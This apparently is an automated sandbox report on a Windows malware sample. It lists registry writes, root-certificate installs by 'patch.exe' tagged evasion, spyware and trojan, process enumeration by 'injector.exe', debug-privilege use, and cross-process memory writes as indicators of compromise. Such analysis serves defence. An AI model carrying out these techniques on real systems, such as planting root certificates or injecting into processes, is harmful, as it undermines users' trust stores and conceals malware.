Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-871 = "Pakistan Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-42 = "E. South America Standard Time"	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-521 = "N. Central Asia Daylight Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-171 = "Central Daylight Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-432 = "Iran Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time"	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-551 = "North Asia Daylight Time"	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-341 = "Egypt Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-891 = "Morocco Daylight Time"	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time"	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-351 = "FLE Daylight Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-982 = "Kamchatka Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-222 = "Alaskan Standard Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-552 = "North Asia Standard Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-352 = "FLE Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-371 = "Jerusalem Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-402 = "Arabic Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-161 = "Central Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-301 = "Romance Daylight Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-592 = "Malay Peninsula Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-371 = "Jerusalem Daylight Time"	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-212 = "Pacific Standard Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1022 = "Bangladesh Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-82 = "Atlantic Standard Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-871 = "Pakistan Daylight Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-101 = "Provides DHCP based enforcement for NAP"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-532 = "Sri Lanka Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-501 = "Nepal Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-302 = "Romance Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\napipsec.dll,-4 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-632 = "Tokyo Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-132 = "US Eastern Standard Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-152 = "Central America Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-692 = "Tasmania Standard Time"	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-431 = "Iran Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-892 = "Morocco Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-381 = "South Africa Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-671 = "AUS Eastern Daylight Time"	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time"	windefender.exe

Modifies system certificate store 2 TTPs 9 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b81400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3040000000100000010000000e4a68ac854ac5242460afd72481b2a442000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	csrss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a40f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a32000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	csrss.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 0f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a42000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6	patch.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 040000000100000010000000acb694a59c17e0d791529bb19706a6e40f0000000100000014000000ce0e658aa3e847e467a147b3049191093d055e6f0b0000000100000034000000420061006c00740069006d006f007200650020004300790062006500720054007200750073007400200052006f006f007400000053000000010000002400000030223020060a2b06010401b13e01640130123010060a2b0601040182373c0101030200c0140000000100000014000000e59d5930824758ccacfa085436867b3ab5044df01d0000000100000010000000918ad43a9475f78bb5243de886d8103c09000000010000000c000000300a06082b06010505070301030000000100000014000000d4de20d05e66fc53fe1a50882c78db2852cae47419000000010000001000000068cb42b035ea773e52ef50ecf50ec52920000000010000007b030000308203773082025fa0030201020204020000b9300d06092a864886f70d0101050500305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f74301e170d3030303531323138343630305a170d3235303531323233353930305a305a310b300906035504061302494531123010060355040a130942616c74696d6f726531133011060355040b130a43796265725472757374312230200603550403131942616c74696d6f7265204379626572547275737420526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100a304bb22ab983d57e826729ab579d429e2e1e89580b1b0e35b8e2b299a64dfa15dedb009056ddb282ece62a262feb488da12eb38eb219dc0412b01527b8877d31c8fc7bab988b56a09e773e81140a7d1ccca628d2de58f0ba650d2a850c328eaf5ab25878a9a961ca967b83f0cd5f7f952132fc21bd57070f08fc012ca06cb9ae1d9ca337a77d6f8ecb9f16844424813d2c0c2a4ae5e60feb6a605fcb4dd075902d459189863f5a563e0900c7d5db2067af385eaebd403ae5e843e5fff15ed69bcf939367275cf77524df3c9902cb93de5c923533f1f2498215c079929bdc63aece76e863a6b97746333bd681831f0788d76bffc9e8e5d2a86a74d90dc271a390203010001a3453043301d0603551d0e04160414e59d5930824758ccacfa085436867b3ab5044df030120603551d130101ff040830060101ff020103300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100850c5d8ee46f51684205a0ddbb4f27258403bdf764fd2dd730e3a41017ebda2929b6793f76f6191323b8100af958a4d46170bd04616a128a17d50abdc5bc307cd6e90c258d86404feccca37e38c637114feddd68318e4cd2b30174eebe755e07481a7f70ff165c84c07985b805fd7fbe6511a30fc002b4f852373904d5a9317a18bfa02af41299f7a34582e33c5ef59d9eb5c89e7c2ec8a49e4e08144b6dfd706d6b1a63bd64e61fb7cef0f29f2ebb1bb7f250887392c2e2e3168d9a3202ab8e18dde91011ee7e35ab90af3e30947ad0333da7650ff5fc8e9e62cf47442c015dbb1db532d247d2382ed0fe81dc326a1eb5ee3cd5fce7811d19c32442ea6339a9	patch.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2380	powershell.exe
436	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
1892	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
992	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
992	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
992	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
992	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
992	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
2844	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
2844	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
2844	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
2844	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
2844	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
2552	powershell.EXE
2552	powershell.EXE
2552	powershell.EXE
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1104	csrss.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1104	csrss.exe
1584	injector.exe
1104	csrss.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe
1584	injector.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
464	Process not Found

Suspicious use of AdjustPrivilegeToken 13 IoCs

description	pid	Process
Token: SeDebugPrivilege	2792	CasPol.exe
Token: SeDebugPrivilege	2380	powershell.exe
Token: SeDebugPrivilege	436	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Token: SeImpersonatePrivilege	436	ufZtkZ7tU2q5FiNysG4oE1Wq.exe
Token: SeDebugPrivilege	1892	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Token: SeImpersonatePrivilege	1892	nWiD3Z1XYXpGAzzD9VqNWAi0.exe
Token: SeSystemEnvironmentPrivilege	1104	csrss.exe
Token: SeDebugPrivilege	2552	powershell.EXE
Token: SeSecurityPrivilege	1216	sc.exe
Token: SeSecurityPrivilege	1216	sc.exe
Token: SeDebugPrivilege	2140	powershell.EXE
Token: SeDebugPrivilege	2208	powershell.EXE
Token: SeDebugPrivilege	3016	powershell.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
788	Eg3CbaPfPvlHomvqcshBcOpb.tmp

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2548 wrote to memory of 2380	2548	ec91ef3c4c02b6c8aff61058bf0b2bb013e2e6a2ee6c805c6d07ad0ae46fa9d1.exe	28
